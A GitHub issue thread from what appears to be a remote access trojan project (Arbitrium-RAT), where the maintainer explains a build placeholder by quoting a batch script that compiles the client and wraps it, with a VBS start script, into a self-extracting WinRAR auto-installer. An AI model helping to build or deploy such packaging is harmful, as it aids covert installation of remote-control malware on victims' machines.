### ISSUE TITLE
What is {Rar_abspath}?

### ISSUE THREAD

**Issue by RpbCry** [BenChaliah/Arbitrium-RAT#2]
What is {Rar_abspath}?

My command line gives this error
'{Rar_abspath}' is not recognized as an internal or external command,
operable program or batch file.

Thank you

**Comment by BenChaliah** [comment]
You should replace it with the absolute path of your winrar, for instance check `Clients/WindowsApp/buildClient.bat` in it you'll find:
```
@echo off
pyinstaller --onefile runFrame.py
copy Client_tools\toolbox.exe dist\
copy Client_tools\SFXAutoInstaller.conf dist\
copy Client_tools\start_script.vbs dist\
cd dist
"C:\Program Files\WinRAR\Rar.exe" a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe
```
you can see that `{Rar_abspath}` was replaced with `"C:\Program Files\WinRAR\Rar.exe"`
